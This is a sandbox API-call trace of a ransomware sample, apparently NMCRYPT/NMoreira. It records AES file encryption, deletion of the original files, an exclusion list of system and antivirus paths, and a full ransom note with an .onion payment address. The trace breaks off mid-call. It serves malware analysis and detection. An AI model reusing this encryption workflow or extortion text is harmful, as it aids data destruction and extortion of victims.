[0169.777] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.777] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4b8) returned 1 [0169.777] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0169.777] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0169.777] wcslen (_String="\\\\?\\") returned 0x4 [0169.777] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2f8) returned 1 [0169.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.778] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3072) returned 1 [0169.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0169.779] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.781] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.781] GetLastError () returned 0x0 [0169.781] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.782] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.782] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.782] GetLastError () returned 0x0 [0169.782] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.783] GetLastError () returned 0x0 [0169.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.783] GetLastError () returned 0x0 [0169.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.783] GetLastError () returned 0x0 [0169.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.783] GetLastError () returned 0x0 [0169.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.783] GetLastError () returned 0x0 [0169.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.783] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.784] GetLastError () returned 0x0 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.784] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.784] GetLastError () returned 0x0 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.784] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.784] GetLastError () returned 0x0 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.784] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.784] GetLastError () returned 0x0 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.784] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0169.784] GetLastError () returned 0x0 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0169.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0169.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0169.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll")) returned 0x20 [0169.785] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", dwFileAttributes=0x20) returned 0 [0169.785] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 1 [0169.785] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll")) returned 0 [0169.786] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0169.786] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 1 [0169.786] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAD4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxad4.tmp")) returned 0xad4 [0169.787] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAD4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxad4.tmp"), dwFlags=0x1) returned 0 [0169.787] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXAD4.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxad4.tmp")) returned 1 [0169.788] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0169.788] wcslen (_String="OK") returned 0x2 [0169.788] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.788] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.788] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0169.788] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0169.788] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0169.788] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0169.788] GetLastError () returned 0x12 [0169.788] FindClose (in: hFindFile=0x9ad538 | out: hFindFile=0x9ad538) returned 1 [0169.789] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\ole db\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0169.789] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0169.790] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0169.791] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0169.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.791] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0169.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.791] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.791] wcslen (_String="\\\\?\\") returned 0x4 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.exe") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.dll") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.lnk") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.bat") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.ini") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.msi") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*.scf") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*AppData*") returned 0 [0169.791] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*Atheros*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*Realtek*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*boot*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*boot*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*ntldr*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*chrome*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*opera*") returned 0 [0169.792] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", pszSpec="*firefox*") returned 0 [0169.792] wcslen (_String="\\\\?\\") returned 0x4 [0169.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad8b8 [0169.793] wcscmp (_String1=".", _String2=".") returned 0 [0169.793] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0169.793] wcscmp (_String1="..", _String2=".") returned 1 [0169.793] wcscmp (_String1="..", _String2="..") returned 0 [0169.793] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*NMCRYPT") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.exe") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.dll") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.lnk") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.bat") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.ini") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.msi") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*.scf") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*AppData*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\java\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\windows\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0169.793] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*Atheros*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*Realtek*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*bootmgr*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*boot*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*boot*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*IO.SYS*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*ntldr*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*chrome*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*opera*") returned 0 [0169.794] PathMatchSpecW (pszFile="msdasqlr.dll.mui", pszSpec="*firefox*") returned 0 [0169.794] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", pszSpec="*") returned 1 [0169.794] strlen (_Str="NMoreira") returned 0x8 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.794] CryptGenRandom (in: hProv=0x8bf310, 